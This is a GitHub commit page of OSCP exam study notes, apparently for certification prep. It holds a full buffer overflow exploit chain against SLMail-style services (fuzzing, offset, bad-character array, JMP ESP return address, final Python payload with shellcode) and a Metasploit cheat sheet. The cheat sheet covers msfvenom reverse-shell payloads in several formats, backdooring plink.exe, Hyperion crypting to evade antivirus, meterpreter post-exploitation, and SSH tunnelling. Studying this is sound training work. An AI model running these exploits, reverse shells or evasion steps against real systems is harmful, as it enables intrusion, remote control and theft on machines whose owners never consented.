Skip to content

Commit

Permalink
OSCP Materials
Browse files Browse the repository at this point in the history
  • Loading branch information
@RihaMaheshwari
RihaMaheshwari committed Jun 20, 2020
1 parent 4dbcb80 commit 6881e91
Show file tree
Hide file tree
Showing 19 changed files with 604 additions and 474 deletions.
76 changes: 0 additions & 76 deletions Approach.txt
View file

This file was deleted.

159 changes: 159 additions & 0 deletions Basics/Buffer Overflow
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,159 @@
# **Buffer Overflow**
## **Exploit Overview**
```
1. Fuzzing
a. Sending malformed data into application input
2. SLMAIL 5.50 MAil Server
a. Found in 2005
b. Affected pop3 pass command
3. Bad Characters
a. 0x00 - Null byte is also used to terminate strings
b. 0x0D - Carriage Return - Signifies that the end of password is reached
c. 0x0A - Line Feed
4. Use msfpayload windows/shell_reverse_tcp LHOST=<IP> EXITFUNC=thread LPORT=<Port> R | msfencode -­‐b "\x00\x0a\x0d"
5. Vulnerable Machines/Application -
a. Linux crossfire
b. Minishare
c. SLMAIL
d. brainpan
```
#### **Easy Access to Next Step -**

1. Copy exe file to windows machine.
2. Run exe in Imunnity debugger.
3. Open a file and write the following command and save it as exploit.py.
```
import socket
import sys
host = 'IP'
port = <port>
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("Connecting to ")+str(host)
s.connect((host,port))
s.send()
s.close()
print("The message has been sent")
except:
print("Unable to connect to ")+ str(host)
sys.exit(0)
```
4. Run the following command -
```
python.exe <Path>\exploit.py
!mona config -set workingfolder c:\logs\%p
!mona pc 1000
!mona pattern_offset <33734132>
!mona findmsp → Safeseh- false
```
5. Send junk and EIP
```
import socket
host = <ip>
port = <port> # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
junk=b”A”*548
EIP = b’BBBB’
s.sendall(junk+EIP)
s.close()
print(“The message has been sent.”)
```
6. Find Bad Character -
```
import socket
host='<ip'
port=80
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port)) # Connects to the Port in Target machine
junk=b”A”*548
EIP = b’BBBB’
bad_char=("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
s.sendall(junk+EIP+bad_char)
s.close()
print(“The message has been sent.”)
```
7.Click on ESP → Rightclick → Follow TCP Dump--> Look for the pattern. If the any character is missing remove the bad character and resend the payload.
8. View → Executable Module -->Safe SEH-->False
9. Rightclick → Search for → JMP ESP
10. Note the Address - 311712F3
11. Replace the EIP with the address as
```
import socket,sys
host = "127.0.0.1"
port = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
junk = (b'A'*524)
EIP = (b'\xF3\x12\x17\x31')
s.sendall(junk+EIP)
s.close()
print("The message has been sent.")
```
13. If EIP doesn't get overwritten try adding nops and see if you can see that in ESP.
```
import socket,sys
host = "<ip>"
port = <port>
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "Connecting to " +str(host)
s.connect((host,port))
s.recv(1024)
junk = b"A"*524
EIP = b'\xf3\x12\x17\x31'
nops = b"C"*10+b"D"*10
print "Sending Payload..."
s.sendall(junk+EIP+nops+payload)
print "Sent"
except:
print "Unable to connect " + str(host)
sys.exit(0)
```
14. ESP shows first 10 D.
15. Create a shell code
```
msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> R -e x86/shikata_ga_nai -b '\x00' -f c
```
16. Listen on <attacker port> on attacker machine
17. Final payload
```
import socket,sys
host = "<ip>"
port = <port>
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "Connecting to " +str(host)
s.connect((host,port))
s.recv(1024)
junk = b"A"*524
EIP = b'\xf3\x12\x17\x31'
nops = b"\x90"*10
shellcode = b"...."
print "Sending Payload..."
s.sendall(junk+EIP+nops+shellcode)
print "Sent"
except:
print "Unable to connect " + str(host)
sys.exit(0)
```
18. Got shell!! Bingo!!
19. Create a payload for linux machine by using the following code
#**msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<port> R -e x86/shikata_ga_nai -b '\x00' -f c**
20. Change the host to vicktims IP and execute python code.
21. Got Victims Shell!! Cheers!
100 changes: 100 additions & 0 deletions Basics/Metasploit
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,100 @@
# **Metasploit Framework**
## **1. Basics**
```
1. msfconsole - Interactive console interface which is most commonly used to run regular tasks
2. msfcli - A deprecated command line interface to MSF which is useful in certain situation
3. armitage - A third party add-on to the MSF providing a graphical user interface to MSF
4. msfvenom - Used to create Payloads
```

## **2. Msfvenom**
```
a. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=<Attacker IP Address> LPORT=<Attacker Port> -f exe -o A.exe
b. JSP - msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attacker IP Address> LPORT=<Attacker Port> -f raw > shell.jsp
c. WAR - msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Attacker IP Address> LPORT=<Attacker Port> -f war > shell.war
d. Python - msfvenom -p cmd/unix/reverse_python LHOST=<Attacker IP Address> LPORT=<Attacker Port> -f raw > shell.py
e. Bash - msfvenom -p cmd/unix/reverse_bash LHOST=<Attacker IP Address> LPORT=<Attacker Port> -f raw > shell.sh
f. Perl - msfvenom -p cmd/unix/reverse_perl LHOST=<Attacker IP Address> LPORT=<Attacker Port> -f raw > shell.pl
g. Follow - https://netsec.ws/?p=331
h. msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<Attacker IP Address> LPORT=<Attacker Port> -b "\x00" -e x86/shikata_ga_nai -f exe -o [[/tmp/1.exe]]
i. msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=<Attacker IP Address> LPORT=<Attacker Port> -b "\x00" -f elf -o [[/tmp/payload]]
j. Follow - http://security-geek.in/2016/09/07/msfvenom-cheat-sheet/ **#Best**
k. Follow - https://www.hackingarticles.in/generating-reverse-shell-using-msfvenom-one-liner-payload/
```

## **3. Setting up Metasploit Framework**
```
1. [[/etc/init.d/postgresql]] start
2. [[/etc/init.d/metasploit]] start
To have these service start at boot time enable them using update-rc.d script.
1. update-rc.d postgresql enable
2. update-rc.d metasploit enable
```
## **4. Exploring Metasploit**
```
1. msfconsole
2. show auxiliary - used for info gathering, scanning and enumuration of various services
3. use <any auxuliary module>
4. info - to get more info on a specific module
5. show options
6. setg RHOST <ip>- change behavior by using global session value, using setg command.
7. search type:auxiliary login
8. hosts - host up
9. db_nmap <ip> - to scan host with nmap
```

## **5. Auxiliary/Exploit Module**
```
1. auxiliary/scanner/snmp/snmp_enum
2. auxiliary/scanner/smb/smb_version
3. auxiliary/scanner/http/webdav_scanner
4. auxiliary/scanner/ftp/ftp_login
5. exploit/windows/pop3/seattlelab_pass
6. exploit/multihandler
7. exploit/windows/local/service_permissions
```
## **6. Staged vs Non-Staged Payload**
```
1. windows/shell_reverse_tcp - Connect back to attacker and spawn a command shell - Nonstaged - Sent in one go
2. windows/shell/reverse_tcp - Connect back to attacker, spawn cmd shell (staged) - Send in two parts
3. Situations where we would prefer to use staged over non-staged:
a. The vulnerability we are exploiting does not have enough buffer space to hold a full payload. As the first part of staged payload is typically smaller than a full payload, these smaller payloads can often save us in tight situations.
b. Antivirus software is detecting embedded shellcode in an exploit. By replacing the embedded shellcode with a staged payload, we will be removing most of the malicious part of the shellcode and injecting it directly into the victim machine memory.
```

## **7. Post Exploitation Meterpreter Commands**
```
1. sysinfo
2. getuid
3. search -f *pass*.txt
4. upload /usr/share/windows-­‐binaries/nc.exe c:\\Users\\Offsec
5. download c:\\Windows\\system32\\calc.exe [[/tmp/calc.exe]]
6. shell
7. exit
8. ftp 127.0.0.1
9. help
10. background #session runs in background
```
## **9. Msfpayload(Old)**
```
1. msfpayload windows/shell_reverse_tcp lhost=<ip> lport=<port> X >shell_reverse.exe
2. msfpayload windows/shell_reverse_tcp lhost=<ip> lport=<port> R | msfencode -e x86/shikata_ga_nai -t exe -c 9 -o shell_reverse_msf_encoded.exe
3. Embedd our shellcode in non-malicious PE executable:
a. msfpayload windows/shell_reverse_tcp lhost=<ip> lport=<port> R | msfencode -e x86/shikata_ga_nai -t exe -c 9 [[/usr/share/windoes-binaries/plink.exe]] -o shell_reverse_msf_encoded.exe
b. Use Hyperion to encrypt our payload:
1. cp shell_reverse_msf_encoded_embedded.exe backdoor.exe
2. cp [[/usr/share/windows-­‐binaries/Hyperion-­‐1.0.zip]] .
3. unzip Hyperion-­‐1.0.zip
4. cd Hyperion-­‐1.0/
5. i586-­‐mingw32msvc-­‐g++ Src/Crypter/*.cpp -­‐o hyperion.exe
6. wine hyperion.exe [[../backdoor.exe]] [[../crypted.exe]]
4. msfpayload windows/meterpreter/reverse_https lhost=<IP< LPORT=<Port> X > met_https_reverse.exe
```

## **10. Building your own msf module**
```
1. mkdir -­‐p ~/.msf4/modules/exploits/linux/misc
2. cd [[~/.msf4/modules/exploits/linux/misc]]
3. cp [[/usr/share/metasploit-­framework/modules/exploits/linux/misc/gld_postfix.rb]] ./crossfire.rb
4. nano crossfire.rb
```
29 changes: 29 additions & 0 deletions Basics/Port Forwarding
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# **Port Forwarding**

Port forwarding is a traffic manipulation technique.
```
1. apt-get install rinetd
2. cat [[/etc/rinetd.conf]]
3. <bindaddress bindport connectaddress connectport>
<w.x.y.z 53 a.b.c.d 80>
```
## **SSH Tunneling**
```
1. Local Port forwarding
a. Allows us to tunnel a local port to remote server, using SSH as the transport protocol.
b. We can use the SSH local port forwarding feature to bypass the existing restriction using syntax similar to the following:
1. ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
c. Once the tunnel is created, we browse to local port 8080, which redirects our traffic through the outbound SSH tunnel on TCP port 53 on our home machine then to the server.
2. Remote Port Forwarding
a. ssh <gateway> -p 53 -R <remote port to bind>:<localhost>:<local port>
3. Dynamic Port Forwarding
a. ssh -D <local proxy port> <target>
4. Reverse SSH Tunnel
a. ssh -f -N -R 2222:127.0.0.1:22 root@<ip>
```

# **HTTP Tunnelling**
```
1. nc -vvn <IP> <Port>
2. CONNECT <IP>:<Port> HTTP/1.0
```
Loading

0 comments on commit 6881e91

Please sign in to comment.